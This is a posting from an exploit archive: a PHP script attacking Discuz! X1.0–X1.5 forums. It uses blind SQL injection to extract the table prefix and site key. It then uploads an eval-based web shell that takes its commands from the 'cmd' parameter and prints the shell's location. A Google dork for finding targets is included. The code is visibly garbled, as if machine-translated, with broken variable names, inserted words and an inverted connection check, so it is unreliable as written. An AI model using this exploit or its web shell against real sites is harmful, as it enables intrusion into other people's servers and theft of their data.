discuz! X1.0 - X1.5 Blind SQL injection exploit & Get Shell

##################################################
# Exploit Title: [discuz! X1.0 - X1.5 Blind SQL injection exploit & Get Shell]
# Date: [06-04-2012]
# Author: [Hacker-Fire]
# Category:: [ webapps]
# Google dork: [Powered by Discuz]
# Tested on: [Windows 7 ]
##################################################
[~] P0c [~] :

<? Php
print_r ('
+ ------------------------------------------------- -------------------------- +
Discuz! 1-1.5 notify_credit.php Blind SQL injection exploit By Hacker-Fire
Description: follow-up getshell add the code down
+ ------------------------------------------------- -------------------------- +
');
if ($ argc <2) {
print_r ('
+ ------------------------------------------------- -------------------------- +
Usage: php '$ argv [0].' Url [pre]
Example:
php '$ argv [0].' http://localhost/ in the
php '. $ argv [0].' http://localhost/ xss_
+ ------------------------------------------------- -------------------------- +
');
exit;
}
error_reporting (7);
the ini_set ('set max_execution_time large', 0);
$ Url = $ argv [1];
$ Pre = $ argv [2]? $ Argv [2]: 'pre_';
$ Target = parse_url ($ url);
extract ($ target);
$ Path1 = $ path. '/ Api / trade / notify_credit.php';
$ Hash = array ();
$ Hash = the array_merge ($ hash range (48, 57));
$ Hash = array_merge ($ hash range (97, 102));

$ Tmp_expstr = "'";
$ Res = send ();
if (strpos ($ res, 'SQL syntax') == false) {var_dump ($ res); die ('Oooops.I can NOT hack it.');}
preg_match ('/ FROM \ s ([a-zA-Z_] +) forum_order /', $ res, $ match);
if ($ the match [1]) $ the pre = $ match [1];
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_setting WHERE'' ='";
$ Res = send ();
if (strpos ($ res, "does not exist") == false) {
echo "Table_pre is WRONG! \ nReady to Crack It.Please Waiting .. \ n";
for ($ i = 1; $ i <20; $ i + +) {
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema = database () AND table_name LIKE'% forum_post_tableid% 'AND LENGTH (REPLACE ( table_name, 'forum_post_tableid','')) = $ i AND'' = '";
$ Res = send ();

if (strpos ($ res, 'SQL syntax')! == false) {

$ Pre ='';
$ Hash2 = array ();
$ Hash2 = array_merge ($ hash2 range (48, 57));
$ Hash2 = array_merge ($ hash2, range (97, 122));
$ Hash2 [] = 95;
for ($ j = 1; $ j <= $ i; $ j + +) {
for ($ k = 0; $ k <= 255; $ k + +) {
if (in_array ($ k, $ hash2)) {
$ Char = dechex ($ k);
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema = database () AND table_name LIKE'% forum_post_tableid% 'AND MID (REPLACE ( table_name, 'forum_post_tableid',''), $ j, 1) = 0x {$ char} AND'' = '";
$ Res = send ();
if (strpos ($ res, 'SQL syntax')! == false) {
echo chr ($ k);
$ The pre = chr ($ k); the break;
}
}
}
}
if (strlen ($ pre)) {echo "\ nCracked ... Table_Pre:". $ pre. "\ n"; break;} else {die ('GET Table_pre Failed ..');};
}}};
echo "Please Waiting .... \ n";
$ Sitekey ='';
for ($ i = 1; $ i <= 32; $ i + +) {
for ($ k = 0; $ k <= 255; $ k + +) {
if (in_array ($ k, $ hash)) {
$ Char = dechex ($ k);
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_setting WHERE skey = 0x6D795F736974656B6579 AND MID (svalue, {$ i}, 1) = 0x {$ char} AND'' = '";
$ Res = send ();
if (strpos ($ res, 'SQL syntax')! == false) {
echo chr ($ k);
$ Sitekey. = Chr ($ k); break;
}}}}
/ *
By: alibaba
Modify and add some code, and if successful will be able to gain the shell
The word secret is: cmd
* /
if (strlen ($ sitekey)! = 32)
{
echo "\ nmy_sitekey not found. try blank my_sitekey \ n";
}
else echo "\ nmy_sitekey: {$ sitekey} \ n";

echo "\ nUploading Shell ...";
$ Module = 'video';
$ Method = 'authauth';
$ Params = 'a: 3: {i: 0; i: 1; i: 1; s: 36: "PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4 ="; i: 2; s: 3: "php";}';
$ Sign = md5 ($ module. '|'. $ Method. '|'. $ Params. '|'. $ Sitekey);
$ Data = "module = $ module & method = $ method & params = $ params & sign = $ sign";
$ Path2 = $ path. "/ Api / manyou / my.php";
POST ($ host, 80, $ path2, $ data, 30);

echo "\ nGetting Shell Location ... \ n";
$ File ='';
for ($ i = 1; $ i <= 32; $ i + +) {
for ($ k = 0; $ k <= 255; $ k + +) {
if (in_array ($ k, $ hash)) {
$ Char = dechex ($ k);
$ Tmp_expstr = "'UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$ pre} common_member_field_home WHERE uid = 1 AND MID (videophoto, {$ i}, 1) = 0x {$ char} AND'' = '";
$ Res = send ();
if (strpos ($ res, 'SQL syntax')! == false) {
echo chr ($ k);
$ File = chr ($ k); the break;
}
}
}
}
echo "\ nShell: $ host $ path / data / avatar /". substr ($ file, 0,1). "/". substr ($ file, 1,1). "/ $ file.php";
exit;

function sign ($ exp_str) {
return md5 ("attach = tenpay & mch_vno = {$ exp_str} & retcode = 0 & key =");
}

function the send () {
global $ host, $ path1, $ tmp_expstr;

$ Expdata = "attach = tenpay & retcode = 0 & trade_no =% 2527 & mch_vno =". Urlencode (urlencode ($ tmp_expstr)). "& Sign =". Sign ($ tmp_expstr);
return POST ($ host, 80, $ path1, $ expdata, 30);
}

function the POST ($ host, $ port, $ path, $ data, $ timeout, $ the cookie ='') {
$ Buffer ='';

$ Fp = fsockopen ($ host, $ port, $ errno, $ errstr, $ timeout);
if ($ fp) die ($ host. '/' $ path. ':'. $ the errstr $ errno is);
else {
fputs ($ fp, the "POST $ path HTTP/1.0 \ r \ n");
fputs ($ fp, "Host: $ host \ r \ n");
fputs ($ fp, "Content-type: application / x-www-form-urlencoded \ r \ n");
fputs ($ fp, "Content-length:" strlen ($ data). "\ r \ n");
fputs ($ fp, "Connection: close \ r \ n \ r \ n");
fputs ($ fp, $ the data. "\ r \ n \ r \ n");

while (! feof ($ fp))
{
$ Buffer = fgets ($ fp, 4096);
}

fclose ($ fp);
}
return $ buffer;
}
?>


##########################################################
[»] Greetz to :
                      #
[ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ]  #
[ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ]              #
[ And all my Freinds + Algerian Hackers ]
        #
##########################################################



#  0day.today [2018-01-02]  #